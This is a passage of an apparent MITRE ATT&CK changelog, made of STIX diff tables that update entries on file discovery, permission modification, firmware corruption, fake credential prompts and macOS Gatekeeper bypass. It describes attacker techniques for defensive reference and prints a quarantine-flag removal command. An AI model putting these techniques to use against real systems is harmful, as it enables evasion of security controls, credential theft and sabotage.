CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A) |
| external_references[1]['source_name'] | capec | Windows Commands JPCERT |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/127.html | https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html |
| external_references[2]['source_name'] | capec | US-CERT-TA18-106A |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/497.html | https://www.us-cert.gov/ncas/alerts/TA18-106A |
| external_references[3]['source_name'] | Windows Commands JPCERT | capec |
| external_references[3]['url'] | https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html | https://capec.mitre.org/data/definitions/127.html |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_detection | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather file and directory information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations. |
| x_mitre_version | 1.3 | 1.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/497.html', 'external_id': 'CAPEC-497'} | |
| x_mitre_platforms | Network | |
| Old Description | New Description |
|---|---|
| Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). | Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM', 'root'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-13 21:08:10.406000+00:00 | 2022-10-19 17:54:06.038000+00:00 |
| description | Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). | Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) |
| external_references[1]['source_name'] | Hybrid Analysis Icacls1 June 2018 | falconoverwatch_blackcat_attack |
| external_references[1]['description'] | Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. | Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022. |
| external_references[1]['url'] | https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 | https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/ |
| external_references[2]['source_name'] | Hybrid Analysis Icacls2 May 2018 | Hybrid Analysis Icacls1 June 2018 |
| external_references[2]['description'] | Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. | Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. |
| external_references[2]['url'] | https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 | https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 |
| external_references[3]['source_name'] | EventTracker File Permissions Feb 2014 | Hybrid Analysis Icacls2 May 2018 |
| external_references[3]['description'] | Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018. | Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. |
| external_references[3]['url'] | https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/ | https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Metadata |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[3] | File: File Metadata | Command: Command Execution |
| x_mitre_version | 2.1 | 2.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'bad_luck_blackcat', 'description': 'Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.', 'url': 'https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf'} | |
| external_references | {'source_name': 'fsutil_behavior', 'description': 'Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.', 'url': 'https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior'} | |
| external_references | {'source_name': 'EventTracker File Permissions Feb 2014', 'description': 'Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.', 'url': 'https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/'} | |
| external_references | {'source_name': 'blackmatter_blackcat', 'description': 'Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.', 'url': 'https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html'} | |
| external_references | {'source_name': 'new_rust_based_ransomware', 'description': 'Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware'} | |
| Old Description | New Description |
|---|---|
| Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards. | Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards. In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'root', 'SYSTEM'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-14 19:31:46.550000+00:00 | 2022-08-31 17:30:05.440000+00:00 |
| description | Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards. | Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards. In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). |
| external_references[1]['source_name'] | Symantec Chernobyl W95.CIH | cisa_malware_orgs_ukraine |
| external_references[1]['description'] | Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019. | CISA. (2022, April 28). Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine. Retrieved July 29, 2022. |
| external_references[1]['url'] | https://www.symantec.com/security-center/writeup/2000-122010-2655-99 | https://www.cisa.gov/uscert/ncas/alerts/aa22-057a |
| external_references[2]['source_name'] | MITRE Trustworthy Firmware Measurement | dhs_threat_to_net_devices |
| external_references[2]['description'] | Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016. | U.S. Department of Homeland Security. (2016, August 30). The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. Retrieved July 29, 2022. |
| external_references[2]['url'] | http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research | https://cyber.dhs.gov/assets/report/ar-16-20173.pdf |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'MITRE Trustworthy Firmware Measurement', 'description': 'Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.', 'url': 'http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research'} | |
| external_references | {'source_name': 'Symantec Chernobyl W95.CIH', 'description': 'Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.', 'url': 'https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99'} | |
| x_mitre_platforms | Network | |
| Old Description | New Description |
|---|---|
| Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) | Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-24 18:21:07.926000+00:00 | 2022-03-08 21:05:20.136000+00:00 |
| description | Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) | Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Script: Script Execution | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Script: Script Execution | |
| Old Description | New Description |
|---|---|
| Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper) The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021) Apps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X) | Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization ) Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions: 1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques) 2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers. 3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID. 4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified. Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton) Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Brandon Dalton @PartyD0lphin', 'Swasti Bhushan Deb, IBM India Pvt. Ltd.'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 21:18:30.629000+00:00 | 2022-10-21 19:30:58.414000+00:00 |
| description | Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper) The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021) Apps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X) | Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization ) Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions: 1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques) 2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers. 3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID. 4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified. Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton) Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). |
| external_references[1]['source_name'] | TheEclecticLightCompany apple notarization | Application Bundle Manipulation Brandon Dalton |
| external_references[1]['description'] | How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021. | Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022. |
| external_references[1]['url'] | https://eclecticlight.co/2020/08/28/how-notarization-works/ | https://redcanary.com/blog/mac-application-bundles/ |
| external_references[2]['source_name'] | Bypassing Gatekeeper | theevilbit gatekeeper bypass 2021 |
| external_references[2]['description'] | Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017. | Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021. |
| external_references[2]['url'] | https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/ | https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/ |
| external_references[3]['source_name'] | 20 macOS Common Tools and Techniques | OceanLotus for OS X |
| external_references[3]['description'] | Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. | Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. |
| external_references[3]['url'] | https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ | https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update |
| external_references[5]['source_name'] | theevilbit gatekeeper bypass 2021 | TheEclecticLightCompany apple notarization |
| external_references[5]['description'] | Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021. | How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021. |
| external_references[5]['url'] | https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/ | https://eclecticlight.co/2020/08/28/how-notarization-works/ |
| external_references[6]['source_name'] | Methods of Mac Malware Persistence | 20 macOS Common Tools and Techniques |
| external_references[6]['description'] | Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017. | Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. |
| external_references[6]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ |
| x_mitre_data_sources[0] | File: File Metadata | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | File: File Metadata |
| x_mitre_defense_bypassed[0] | Application control | Anti-virus |
| x_mitre_defense_bypassed[1] | Anti-virus | Application Control |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
